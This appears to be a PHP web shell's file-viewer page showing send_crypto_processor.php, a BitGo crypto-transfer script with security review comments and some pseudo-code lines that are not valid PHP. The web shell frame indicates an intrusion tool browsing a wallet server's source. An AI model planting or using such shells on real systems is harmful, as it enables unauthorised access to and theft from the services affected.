PHP WebShell

Текущая директория: /var/www/bitcardoApp

Просмотр файла: send_crypto_processor.php

<?php
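// === Database Configuration ===
// The database password is read from the process environment, the same way the
// wallet encryption key is loaded further down with getenv(). A password kept
// as a literal in this file is disclosed to anyone who can read the source
// (repository access, backups, a file-read bug, a server that returns the file
// as text instead of executing it).
// NOTE(review): the password that used to be hard-coded here has to be treated
// as exposed and rotated. The environment variable name is this edit's choice;
// align it with the deployment's secret store.
define('DB_HOST', 'localhost');
define('DB_USER', 'bitcardo_wallet');
$dbPassword = getenv('DB_PASS');
if ($dbPassword === false || $dbPassword === '') {
    // Fail closed: never fall back to a built-in default credential.
    error_log('DB_PASS is not set in the environment');
    http_response_code(500);
    die('Service configuration error.');
}
define('DB_PASS', $dbPassword);
unset($dbPassword);
define('DB_NAME', 'bitcardo_wallet');

// === Connect to DB ===
// mysqli either returns false or throws mysqli_sql_exception, depending on the
// configured report mode, so both paths are handled. The driver's error text
// (host, user name, server details) goes to the server log only; the client
// gets a generic message.
$connectError = null;
try {
    $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASS, DB_NAME);
    if (!$conn) {
        $connectError = mysqli_connect_error();
    }
} catch (mysqli_sql_exception $e) {
    $conn = false;
    $connectError = $e->getMessage();
}
if (!$conn) {
    error_log('Database connection failed: ' . $connectError);
    http_response_code(500);
    die('Database connection failed.');
}
unset($connectError);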

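// === BitGo API Configuration ===
// The access token authorises spending from the wallets handled below, so it
// is loaded from the environment instead of being stored in the source file.
// NOTE(review): the token that used to be hard-coded here has to be treated as
// exposed and revoked; any replacement should be scoped as narrowly as the
// provider allows (IP restriction, spending limits) - confirm what applies.
// The environment variable name is this edit's choice.
$bitgoToken = getenv('BITGO_ACCESS_TOKEN');
if ($bitgoToken === false || $bitgoToken === '') {
    // Fail closed: no token, no API calls.
    error_log('BITGO_ACCESS_TOKEN is not set in the environment');
    http_response_code(500);
    die('Service configuration error.');
}
define('BITGO_ACCESS_TOKEN', $bitgoToken);
unset($bitgoToken);
define('BITGO_ENTERPRISE_ID', '6816dcc10aa7119c1ad94c489d0bd9fe');
// Plain HTTP: the bearer token and the wallet passphrase are sent to this URL
// unencrypted. That is only tolerable while the endpoint is a loopback address
// (presumably a local signing proxy - confirm); it must never point off-host.
define('BITGO_API_BASE_URL', 'http://127.0.0.1:3080/api/v2');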


if(user submit form){
    
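    // === Input ===
    // All three values are attacker-controlled. A missing field or an array
    // value (e.g. "coin[]=x") must not reach trim()/strtolower(), where it
    // would raise a warning or a TypeError whose text may be shown to the
    // client; anything that is not a string is normalised to ''.
    // NOTE(review): nothing in this listing shows that the caller is
    // authenticated, authorised to spend from the wallet, or protected against
    // cross-site request forgery - confirm those checks exist before this point.
    $coin = is_string($_POST['coin'] ?? null) ? strtolower(trim($_POST['coin'])) : '';
    $amount = is_string($_POST['amount'] ?? null) ? $_POST['amount'] : '';
    $recipient = is_string($_POST['recipient'] ?? null) ? $_POST['recipient'] : '';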

    /**
     * Number of base units (smallest indivisible amount) in one whole coin.
     *
     * NOTE(review): an unknown ticker yields 1 rather than an error, so the
     * caller ends up treating the entered amount as a raw base-unit count.
     * Callers handling money should reject tickers that are not listed here.
     *
     * @param string $coin Lower-case ticker used as the lookup key.
     * @return int Base units per coin, or 1 when the ticker is not listed.
     */
    function getBaseUnits($coin) {
        $unitsPerCoin = [
            'tbtc' => 100000000,
            'teth' => 1000000000000000000,
            'tsol' => 1000000000,
            'usdc' => 1000000,
        ];

        // Unlisted tickers fall back to a multiplier of 1.
        return $unitsPerCoin[$coin] ?? 1;
    }

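    $baseUnit = getBaseUnits($coin);

    // Accept only a plain non-negative decimal. floatval() would silently turn
    // "abc" into 0 and accept signs and exponents ("-1", "1e30").
    if (!is_string($amount) || !preg_match('/^[0-9]+(?:\.[0-9]+)?$/D', $amount)) {
        http_response_code(400);
        die('Invalid amount.');
    }

    // Fail closed on zero and on values that do not fit a PHP integer: casting
    // an out-of-range float to int gives an undefined result, which would then
    // be sent as the transfer amount.
    // NOTE(review): the conversion still goes through a float, so amounts with
    // more than about 15 significant digits are rounded (relevant for the
    // 18-decimal coin). Exact string or arbitrary-precision arithmetic would
    // avoid that.
    $scaledAmount = round((float) $amount * $baseUnit);
    if ($scaledAmount < 1 || $scaledAmount >= (float) PHP_INT_MAX) {
        http_response_code(400);
        die('Amount out of range.');
    }
    $amountInBase = (int) $scaledAmount;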

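    //find wallet locally
    if(wallet is local){

        
    }else{
        // Sends $amountInBase of $coin from the central wallet to $recipient
        // through the BitGo endpoint and records the result in `transactions`.
        // NOTE(review): nothing here makes the request idempotent, so a repeated
        // or replayed form submission sends the funds again - confirm a one-time
        // token or a pending-transfer record exists upstream.

        // === Validate request values before any secret is touched ===
        // $coin becomes a URL path segment below; restrict it to ticker
        // characters so slashes, dots and query characters cannot alter the path.
        if (!is_string($coin) || !preg_match('/^[a-z0-9:_-]+$/D', $coin)) {
            http_response_code(400);
            die('Invalid coin.');
        }
        if (!is_string($recipient) || $recipient === '') {
            http_response_code(400);
            die('Invalid recipient.');
        }
        // A zero or negative amount means the conversion failed upstream.
        if (!is_int($amountInBase) || $amountInBase <= 0) {
            http_response_code(400);
            die('Invalid amount.');
        }

        // === Load encryption key ===
        // The key must decode to exactly 32 bytes for AES-256.
        $key_base64 = getenv("CENTRAL_WALLET_KEY");
        $key = base64_decode($key_base64, true);
        if (!$key || strlen($key) !== 32) {
            die("? Missing or invalid encryption key.");
        }

        // === Get central wallet ===
        $stmt = $conn->prepare("SELECT * FROM cwallet WHERE coin = ? LIMIT 1");
        if (!$stmt) {
            error_log('Central wallet lookup could not be prepared: ' . $conn->error);
            http_response_code(500);
            die('Wallet lookup failed.');
        }
        $stmt->bind_param("s", $coin);
        $stmt->execute();
        $result = $stmt->get_result();

        if ($row = $result->fetch_assoc()) {
            // Strict decoding: malformed base64 yields false instead of garbage bytes.
            $encrypted_phrase = base64_decode($row['encrypted_phrase'], true);
            $iv = base64_decode($row['dynamic_iv'], true);

            if ($iv === false || strlen($iv) !== 16) {
                die("? Invalid IV length.");
            }
            if ($encrypted_phrase === false || $encrypted_phrase === '') {
                die("? Failed to decrypt passphrase.");
            }

            // NOTE(review): AES-256-CBC provides no integrity protection. A
            // modified ciphertext is only rejected when the padding happens to
            // break; an authenticated mode (or an added MAC) would detect tampering.
            $passphrase = openssl_decrypt($encrypted_phrase, 'AES-256-CBC', $key, OPENSSL_RAW_DATA, $iv);
            if ($passphrase === false || $passphrase === '') {
                die("? Failed to decrypt passphrase.");
            }

            $wallet_id = $row['wallet_add_id'];
            $sender_address = $row['wallet_address'];

            // === Send payload ===
            $payload = [
                'address' => $recipient,
                'amount' => $amountInBase,
                'walletPassphrase' => $passphrase
            ];
            if ($coin === 'tsol') {
                $payload['type'] = 'transfer';
            }

            // Both path segments are encoded so neither can add separators.
            $url = BITGO_API_BASE_URL . '/' . rawurlencode($coin)
                . '/wallet/' . rawurlencode((string) $wallet_id) . '/sendcoins';
            $ch = curl_init($url);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST => true,
                CURLOPT_HTTPHEADER => [
                    "Content-Type: application/json",
                    "Authorization: Bearer " . BITGO_ACCESS_TOKEN
                ],
                CURLOPT_POSTFIELDS => json_encode($payload)
            ]);

            $response = curl_exec($ch);
            // Read the error state BEFORE closing the handle; querying a closed
            // handle does not report the transfer error on older PHP versions.
            $curlErrno = curl_errno($ch);
            $curlError = curl_error($ch);
            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);

            // The upstream body and error text are escaped before being echoed:
            // they can contain request-derived values (recipient, coin) and must
            // not be interpreted as markup by the browser.
            $safeResponse = htmlspecialchars((string) $response, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

            if ($curlErrno !== 0) {
                // A transport error is ambiguous: the send may or may not have
                // been accepted. Reconcile against the wallet before retrying.
                error_log("sendcoins transport error for $coin: $curlError");
                echo "? cURL error: " . htmlspecialchars($curlError, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            } elseif ($httpCode !== 200) {
                echo "? BitGo error ($httpCode):<br><pre>$safeResponse</pre>";
            } else {
                $data = json_decode($response, true);
                $txid = $data['txid'] ?? null;

                // === Record transaction ===
                // Funds have already left the wallet at this point, so a failed
                // insert is logged with the txid instead of being ignored.
                // NOTE(review): the amount is bound as a double ("d"), which can
                // round; a decimal string would keep the exact value.
                $recorded = false;
                try {
                    $insert = $conn->prepare("
                        INSERT INTO transactions 
                        (coin, sender_address, receiver_address, amount, type, txid, confirmation, status, applied, created_at) 
                        VALUES (?, ?, ?, ?, 'send', ?, 0, 'pending', 0, NOW())
                    ");
                    $recorded = $insert
                        && $insert->bind_param("sssds", $coin, $sender_address, $recipient, $amount, $txid)
                        && $insert->execute();
                } catch (mysqli_sql_exception $e) {
                    error_log('Recording sent transaction failed: ' . $e->getMessage());
                }

                if ($recorded) {
                    echo "? Transaction sent and recorded!<br><pre>$safeResponse</pre>";
                } else {
                    error_log('Transaction sent but NOT recorded; txid=' . var_export($txid, true));
                    echo "Transaction sent, but it could not be recorded.<br><pre>$safeResponse</pre>";
                }
            }

        } else {
            echo "? No central wallet found for coin: " . htmlspecialchars($coin, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        }
    }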
}

?>



Для локальной разработки. Не используйте в интернете!